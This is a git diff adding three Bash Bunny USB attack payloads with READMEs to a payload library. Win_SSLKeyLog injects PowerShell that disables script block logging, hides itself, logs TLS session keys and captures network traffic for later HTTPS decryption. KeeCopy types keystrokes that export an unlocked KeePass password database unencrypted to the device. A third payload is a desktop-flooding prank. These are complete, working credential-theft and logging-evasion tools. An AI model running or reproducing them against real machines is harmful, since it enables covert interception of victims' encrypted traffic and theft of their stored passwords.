diff --git a/payloads/library/credentials/win_sslkeylog/README.md b/payloads/library/credentials/win_sslkeylog/README.md new file mode 100644 index 00000000..26f5e470 --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/README.md @@ -0,0 +1,63 @@ +# "Microsoft Windows" SSLKEYLOG + +- Title: Win_SSLKeyLog +- Author: TW-D +- Version: 1.0 +- Target: Microsoft Windows +- Category: Credentials + +## Description + +> +> Captures the client network session. +> +> Captures the client side session keys. +> + +1) Partially avoids "PowerShell Script Block Logging". +2) Closing of all windows. +3) Hide "PowerShell" window. +4) Check if current process have "Administrator" privilege. +5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. +6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". +7) Writes the file system cache to disk. +8) Safely eject. + +## Configuration + +From "payload.txt" change the values of the following constants : +```bash + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly SNIFFING_TIME=300 + + +``` + +## Required + +Utility that converts an .etl file containing a Windows network packet capture into .pcapng format. +[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng) + +Wireshark network protocol analyzer. +[WIRESHARK](https://www.wireshark.org/) + +## Steps + +Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng". +``` +.\etl2pcapng.exe .\capture.etl .\capture.pcapng +``` + +Open your "capture.pcapng" with "Wireshark". + +Configure "Wireshark" for HTTPS decryption. +``` +Edit - Preferences +Protocols - (SSL and/or TLS) +(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt +``` + +Happy hunting. diff --git a/payloads/library/credentials/win_sslkeylog/payload.ps1 b/payloads/library/credentials/win_sslkeylog/payload.ps1 new file mode 100644 index 00000000..b0df0e4b --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/payload.ps1 @@ -0,0 +1,58 @@ +# +# Author: TW-D +# Version: 1.0 +# + +Param ( + [String] $BB_VOLUME, + [Int] $SNIFFING_TIME +) + +# Partially avoids "PowerShell Script Block Logging". +# +$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static") +$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()) +$etw_provider.SetValue($null, $event_provider) + +# Closing of all windows. +# +Get-Process -Name "explorer" | Stop-Process + +# Hide "PowerShell" window. +# +$Script:showWindowAsync = Add-Type -MemberDefinition @" +[DllImport("user32.dll")] +public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); +"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru +$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null + +# Check if current process have "Administrator" privilege. +# +If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) { + + $bb_loot = "${BB_VOLUME}loot\" + + # Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. + # + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User") + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User") + + # Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". + # + (NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null + Start-Sleep -Seconds $SNIFFING_TIME + (NETSH trace stop) | Out-Null + + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User") + +} + +"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force + +# Writes the file system cache to disk (thanks to @dark_pyrro). +# +Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1)) + +# Safely eject (thanks to @Night (9o3)). +# +(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject") \ No newline at end of file diff --git a/payloads/library/credentials/win_sslkeylog/payload.txt b/payloads/library/credentials/win_sslkeylog/payload.txt new file mode 100644 index 00000000..1dbcb386 --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/payload.txt @@ -0,0 +1,108 @@ +#!/bin/bash +# +# Title: Win_SSLKeyLog +# +# Description: +# Captures the client network session. +# Captures the client side session keys. +# +# 1) Partially avoids "PowerShell Script Block Logging". +# 2) Closing of all windows. +# 3) Hide "PowerShell" window. +# 4) Check if current process have "Administrator" privilege. +# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. +# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". +# 7) Writes the file system cache to disk (thanks to @dark_pyrro). +# 8) Safely eject (thanks to @Night (9o3)). +# +# Author: TW-D +# Version: 1.0 +# Category: Credentials +# Target: Microsoft Windows 10 +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1) +# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +# +# REQUIREMENTS +# =============== +# The target user must belong to the 'Administrator' group. +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Cyan inverted single blink ...................... SPECIAL +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly SNIFFING_TIME=300 + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION +udisk mount + +######## ATTACK ######## + +LED ATTACK + +Q DELAY 5000 +Q GUI r +Q DELAY 5000 +Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass" +Q DELAY 1500 +Q CTRL-SHIFT ENTER +Q DELAY 5000 +Q LEFTARROW +Q DELAY 3000 +Q ENTER +Q DELAY 7000 + +LED STAGE2 + +Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\"" +Q ENTER +Q DELAY 3500 + +Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\"" +Q ENTER +Q DELAY 1500 + +Q STRING "CD \"\${BB_SWITCH}\"" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}" +Q ENTER +Q DELAY 1500 + +LED SPECIAL + +until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done + +######## CLEANUP ######## + +LED CLEANUP + +rm /root/udisk/loot/done.txt +sync +udisk unmount + +######## FINISH ######## + +LED FINISH + +shutdown -h 0 \ No newline at end of file diff --git a/payloads/library/exfiltration/keecopy/README.md b/payloads/library/exfiltration/keecopy/README.md new file mode 100644 index 00000000..4166cf2a --- /dev/null +++ b/payloads/library/exfiltration/keecopy/README.md @@ -0,0 +1,33 @@ +# KeePass Automated Exporter + +- Title: KeeCopy +- Author: jrwimmer +- Version: 1.0 +- Target: Windows Vista+ +- Category: Exfiltration + +## Description + +Performs keystroke automation to export an unencrypted copy of an unlocked KeePass database +The copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition + +Important Considerations: + +This script makes the following assumptions. +- The target computer is unlocked +- The target computer has KeePass 2.x installed and running with an unlocked database +- KeePass only has one database open, or the desired database was the last one in focus +- KeePass is using the default "Show KeePass window" hot key of: `Ctrl + Alt + K` + +## Configuration + +Hot key settings and/or script tweaks may be necessary depending on the target system. + +## STATUS + +| LED | Status | +| -------- | ------------------------- | +| STAGE1 | Determine output location | +| STAGE2 | Export database | +| FINISH | Payload complete | + diff --git a/payloads/library/exfiltration/keecopy/payload.txt b/payloads/library/exfiltration/keecopy/payload.txt new file mode 100644 index 00000000..2d3bafb1 --- /dev/null +++ b/payloads/library/exfiltration/keecopy/payload.txt @@ -0,0 +1,102 @@ +#!/bin/bash +# +# Title: KeeCopy +# Description: All-in-one script using keystroke automation to export an unencrypted copy of an unlocked KeePass database. +# The database copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition +# Author: jrwimmer +# Version: 1.0 +# Category: Exfiltration +# Target: Windows Vista+ (PowerShell, clip.exe) +# Attackmodes: HID, Storage +# +# + +################################## +# Options # +################################## + +# KEEPASS_SHOW (DUCKY KEY COMBO) - Specify the hot key combination anticipated to show the KeePass window +KEEPASS_SHOW="CTRL-ALT k" + +# KEEPASS_WAITSAVE (MILLISECONDS) - How long to wait for KeePass to complete the export +KEEPASS_WAITSAVE=5000 + +# POWEROFF_AFTER (Y/N) - Power down the BashBunny upon completion +POWEROFF_AFTER="Y" + + +################################## +# Stage 1: Determine destination # +################################## +LED STAGE1 + +# Activate HID and STORAGE capabilities +ATTACKMODE HID STORAGE + +# Open PowerShell +RUN WIN powershell.exe +QUACK DELAY 2000 + +# Locate the BashBunny volume and store it on the clipboard +QUACK STRING "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \"(gwmi win32_volume -Filter {label='BashBunny'}).Name\" | clip;exit" +QUACK ENTER + +################################## +# Stage 2: Export database # +################################## +LED STAGE2 + +# Open KeePass +QUACK $KEEPASS_SHOW +QUACK DELAY 500 + +# Open the File menu +QUACK ALT f +QUACK DELAY 100 + +# Select "Export" +QUACK e +QUACK DELAY 100 + +# Move focus into the format selector +QUACK TAB +QUACK TAB + +# Skip down to "Customizable HTML File" +QUACK c + +# Move up to "KeePass XML (2.x)" +QUACK UP + +# Move focus to the Destination File field +QUACK TAB + +# Paste the path copied in STAGE1 +QUACK CTRL v + +# Append the rest of the destination path +QUACK STRING "loot\KPDB-$(date +%Y%m%d-%k%M%S).xml" + +# ...and export! +QUACK ENTER + +# Wait for KeePass to complete the export +QUACK DELAY $KEEPASS_WAITSAVE + +################################## +# Cleanup # +################################## +LED CLEANUP + +# Synchronize disks +SYNC + +################################## +# Finish # +################################## +LED FINISH + +# Power off +if [ $POWEROFF_AFTER == "Y" ]; then + halt --poweroff +fi \ No newline at end of file diff --git a/payloads/library/prank/DesktopFlood/README.md b/payloads/library/prank/DesktopFlood/README.md new file mode 100644 index 00000000..9602cb8c --- /dev/null +++ b/payloads/library/prank/DesktopFlood/README.md @@ -0,0 +1,13 @@ +# DesktopFlood +Floods the desktop with a image of your choice + +## Configuration +Image Link, Image Name, Amount of Images. Bluetooth if you want, in Setup + +## LED + +| COLOR | DESCRIPTION | +|---------|-------------| +| White | Setup/Wait | +| Yellow | Attacking | +| Green | Finished | diff --git a/payloads/library/prank/DesktopFlood/payload.txt b/payloads/library/prank/DesktopFlood/payload.txt new file mode 100644 index 00000000..bc13e6be --- /dev/null +++ b/payloads/library/prank/DesktopFlood/payload.txt @@ -0,0 +1,46 @@ +#!/bin/bash +# +# Title: Desktop Flood +# Description: Floods desktop with image it downloads from link +# Author: JustaProgrammer9 +# Category: Prank +# Target: Windows +# Attackmodes: HID +# + +#--// CONFIG \\--# + +#removing [ https:// ] can help keep command below runbox character limit + +ImageLink='i.ytimg.com/vi/7yN0g2QIJSU/maxresdefault.jpg' + +ImageName="Gift" + +Amount=50 + + +####--// SETUP \\--#### + +LED W + +ATTACKMODE HID + +#--> FOR BLUETOOTH <--# + +#WAIT_FOR_PRESENT YourDevice +#WAIT_FOR_NOT_PRESENT YourDevice + + +#--// ATTACK \\--# + +LED Y + +RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\\$ImageName\$_.jpg\"}\"" + +Q ENTER + + +####--// DONE \\--#### + +LED G +